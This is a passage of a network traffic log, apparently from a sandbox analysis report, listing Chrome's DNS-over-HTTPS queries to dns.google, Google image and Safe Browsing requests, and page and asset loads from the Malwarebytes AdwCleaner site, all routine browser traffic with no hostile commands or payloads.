                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABBnVwZGF0ZQpnb29nbGVhcGlzA2NvbQAAAQABAAApEAAAAAAAAE4ADABKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /safebrowsing/csd/client_model_v5_variation_6.pb HTTP/2.0
                                                                                                                                                                      host: ssl.gstatic.com
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      OPTIONS
                                                                                                                                                                      https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                                                                                                                                                      host: play.google.com
                                                                                                                                                                      accept: */*
                                                                                                                                                                      access-control-request-method: POST
                                                                                                                                                                      access-control-request-headers: x-goog-authuser
                                                                                                                                                                      origin: https://www.google.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-site: same-site
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.14:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0 HTTP/2.0
                                                                                                                                                                      host: encrypted-tbn0.gstatic.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /adwcleaner HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      referer: https://www.google.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      cache-control: private
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-aspnet-version: 4.0.30319
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: ppVAMHwt--5_xytnbTKhE2e6xxpl1B3n6J2-e-MNzCMuAG543bkdZw==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/fonts.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/fonts.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"1f51d332750d81:0"
                                                                                                                                                                      last-modified: Thu, 14 Apr 2022 17:43:49 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 9fJEsaiVrrFDcMdfk4q6YScKIGN3Fw9DVLNQ1czA4NICekXvtFq7FQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/js/library/jquery.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /js/library/jquery.min.js HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"8ef7f02e56cdd81:0"
                                                                                                                                                                      last-modified: Wed, 21 Sep 2022 01:05:04 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: io2SNou-9CwKICze9xNqBvHGNVk7RNUs91Zs-rUQkjVOzGPksrmSBQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/bootstrap_mwb.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/bootstrap_mwb.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Fri, 18 Nov 2022 02:09:04 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      etag: W/"6ebbf6bbf2fad81:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: q5yVdYXNvvdyRJ8DPN3RNypZ-WUqp-u6-U_3idPwihwsiywPcB21Nw==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/bootstrap_overrides.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/bootstrap_overrides.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      last-modified: Wed, 07 Dec 2022 21:33:27 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:02 GMT
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      etag: W/"d10528b83ad91:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: 0zdS6x7x1MqpKjWRsxvr3fDAfCWyb_8OiOKUhgkfQxLol-PjZF-3Mg==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/font-awesome.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/font-awesome.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      last-modified: Sun, 09 May 2021 19:59:35 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      etag: W/"1874e4d5d45d71:0"
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: YI1HIooFZs6Z-8bK6CLmvXjFvxkapU9M_U92oCjSawJ9ExBPXNS1oQ==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/styles.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/styles.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/css,*/*;q=0.1
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: style
                                                                                                                                                                      referer: https://www.malwarebytes.com/adwcleaner
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      content-length: 372
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:43:24 GMT
                                                                                                                                                                      last-modified: Wed, 02 Nov 2022 00:35:18 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      etag: "316a7ffb52eed81:0"
                                                                                                                                                                      x-cache: Hit from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: NrYl-47a1mm5TKHNeePBj7ejfUasvuFmZlsPbr_80dPkhQj8CnilIg==
                                                                                                                                                                      age: 338
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.malwarebytes.com/css/styles_overrides.min.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.124:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /css/styles_overrides.min.css HTTP/2.0
                                                                                                                                                                      host: www.malwarebytes.com
